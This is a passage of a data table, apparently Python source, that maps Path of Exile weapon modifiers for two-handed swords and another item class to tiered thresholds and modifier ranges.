"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Two Hand Sword": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
